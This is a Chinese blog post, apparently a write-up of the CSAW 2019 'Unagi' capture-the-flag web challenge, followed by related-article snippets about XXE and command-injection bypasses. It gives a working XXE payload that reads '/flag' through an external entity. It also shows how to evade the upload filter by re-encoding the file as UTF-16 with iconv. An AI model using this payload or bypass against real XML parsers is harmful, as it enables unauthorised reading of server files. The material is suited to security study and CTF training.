[Web_Unagi]xxe注入过滤绕过

于 2023-08-06 14:21:41 发布
阅读量557 收藏
点赞数
分类专栏: wp 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61839115/article/details/132130623
版权

文章目录

[Web_Unagi]xxe注入过滤绕过

image-20230806141659549

image-20230806141706534

提示我们需要上传文件,并且flag在根目录下,

上传文件的格式为:

<users>
    <user>
        <username>alice</username>
        <password>passwd1</password>
        <name>Alice</name>
        <email>alice@fakesite.com</email>
        <group>CSAW2019</group>
    </user>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>
        <group>CSAW2019</group>
    </user>
</users>

很明显使用xxe注入

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>gg</username>
        <password>passwd1</password>
        <name>ggg</name>
        <email>alice@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
</users>

但是上传上去发现被过滤了,我们需要想办法绕过

由于xml文件支持UTF-16编码,所以我们可以把文件转为UTF-16

iconv -f UTF-8 -t UTF-16 1.xml > flag.xml

然后再上传:

image-20230806142008834

Tr4n
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XXE的利用手法及绕过
qq_36334672的博客
01-29 156
当目标运行我们引用外部实体时,可通过构造恶意数据,执行任意文件读取,内网端口探测,攻击内网,甚至命令执行——安装了expect扩展。XXE主要由DTD文档构成,因此先介绍DTD,如下所示红色部分为DTD1、开头必须声明为XML <?2、第二行为例如 <!DOCTYPE NOTE //声明此文档为NOTE类型DOCTYPE ANY //也可以为ANYDOCTYPE ROOT //ROOT之类3、DTD有内外引用两种方式1)内部的 DOCTYPE 声明2)外部文档声明。
XXE总结
Ciyaso的博客
07-16 739
一、XXE 是什么 XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要被 XML 中其他的一些名字相似的东西扰乱了思维(盯好外部实体就行了),如果能注入 外部实体并且成功解析的话,这就会大大拓宽我们 XML 注入的攻击面(这可能就是为什么单独说 而没有
WEB漏洞-XXE&XML之利用检测绕过
m0_65137829的博客
07-24 1435
XXE-"xml external entity injection" 服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
BUUCTF(11.14-11.22)
XINO
11-22 1807
记:上周抽空刷的BUU题目,记录一下解题过程的同时与大家分享交流 [Zer0pts2020]Can you guess it? 一个查询页面,提交东西提示wrong 有个源码链接,我们点开看一下 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you ar
XXE xml注入漏洞 入门
weixin_51458899的博客
02-17 2127
xxe 入门
unagi:无的WordPress仪表板
03-04
您可以使用unagi_show_diff过滤器来显示非全局消息。 默认情况下,该插件仅遵守具有“ notice”类的通知消息。 大多数插件使用“ notice”类作为输出的包装。 您可以使用unagi_xpath_expression过滤器来自定义目标...
-Unagi-Ingress-Hackathon
02-14
【标题】"-Unagi-Ingress-Hackathon" 指的可能是一场以"Unagi Ingress"为主题的黑客马拉松活动,参与者可能需要利用技术解决与Ingress游戏相关的挑战。Ingress是一款由Niantic开发的增强现实游戏,玩家分为两个阵营...
unagi:现代浏览器上的RPG编辑器
05-04
a木 现代浏览器上的RPG编辑器 环境 到目前为止,仅在Mac OS X Chrome上对此进行了测试。 怎么跑 要求 脚步 运行./build.sh 运行go run testserver.go 访问
Python库 | unagi-0.1.3.dev3.tar.gz
05-24
资源分类:Python库 所属语言:Python 资源全名:unagi-0.1.3.dev3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
unagi:搜索和下载Hyper Suprime-Cam(HSC)斯巴鲁战略调查(SSP)中的数据
05-02
以下是有关我尝试过的著名鱼场所的视频博客: 。 它非常靠近东京市中心,距离Kavli-IPMU很少。 如果您想了解更多有关这种令人惊叹的食物的信息,请尝试import unagi; unagi.unagi() Jupyter笔记本中的import unagi...
初识XXE漏洞
Sea_Sand息禅
06-05 801
1、XXE简介 XXE全称是XML External Entity,也就是XML外部实体注入。 如果系统允许攻击者利用XML调用外部实体,那么攻击这就可以在调用外部实体时构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 2、可能的场景 很多的网站都会对xml文件进行解析,解析的时候都有可能出现可用的XXE漏洞,从而被攻击利用,攻击的方法基于实体中可以使用的协议...
XXE - 实体注入
qq_58000413的博客
10-04 560
只是一个名字而已。XML像HTML、传输数据、无预定义(预先定义好的东西)
XXE攻防——XML外部实体注入
aezwm4109的博客
05-24 2141
转自腾讯安全应急响应中心 一、XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外...
网络安全笔记 -- XXE&XML(利用、检测、绕过
swy66的博客
09-24 1597
XXE(XML外部实体注入),利用、检测、绕过
39:WEB漏洞-XXE&XML之利用检测绕过全解
mingyqf的博客
04-17 440
参考博客:https://www.cnblogs.com/zhengna/p/15740341.html 本文为作者本人笔记和复现,侵删 [39:WEB漏洞-XXE&XML之利用检测绕过全解] 思维导图 知识点 XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。 XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞,XXE漏洞发
2021-10-01
clearloveQAQ的博客
10-17 2906
命令执行: eval类 1.过滤flag: (1)用通配符绕过?c=system('cat f*'); (2)复制:system("cp fla*.php 1.txt") 执行文件:1.txt 2.过滤flag,php,system(对命令执行函数进行过滤) 命令执行函数 因为system被过滤这里可用反引号绕过 ?c=echo `cat f*`; ?c=eval($_GET[1]);&1=system('cat flag.php'); 3.过滤flag...
XXE漏洞 解决方案(JAVA版本)
goldDaNiu的博客
07-05 9342
/**      * 解析xml,返回第一级元素键值对。如果第一级元素有子节点,则此节点的值是子节点的xml数据。      * @param strxml      * @return      * @throws JDOMException      * @throws IOException      */      public static Map doXMLParse(String...
xxe漏洞的学习与利用总结
weixin_30701575的博客
07-29 2333
前言 对于xxe漏洞的认识一直都不是很清楚,而在我为期不长的挖洞生涯中也没有遇到过,所以就想着总结一下,撰写此文以作为记录,加深自己对xxe漏洞的认识。 xml基础知识 要了解xxe漏洞,那么一定得先明白基础知识,了解xml文档的基础组成。 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括...
XXE的理解与绕过
weixin_50464560的博客
11-30 1559
转载至https://www.freebuf.com/articles/web/291094.html 前置知识XXE如何理解?它是可扩展标记语言 ( XML) 用于存储和传输数据。通常始于异步JavaScript和XML技术(ajax技术):网页应用能够快速地将增量更新呈现在用户界面上,而不需要重载(刷新)整个页面。目前JSON的使用比XML更加普遍。JSON和XML都被用于在Ajax模型中的XML技术。这种标记语言允许开发人员定义和表示任意数据结构的HTML。以下为定义属性和值的Security Ass
[CSAWQual 2019]Unagi
最新发布
07-27
- *1* [[CSAWQual 2019]Web_Unagi xxe转码绕过waf](https://blog.csdn.net/qq_54929891/article/details/124481254)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值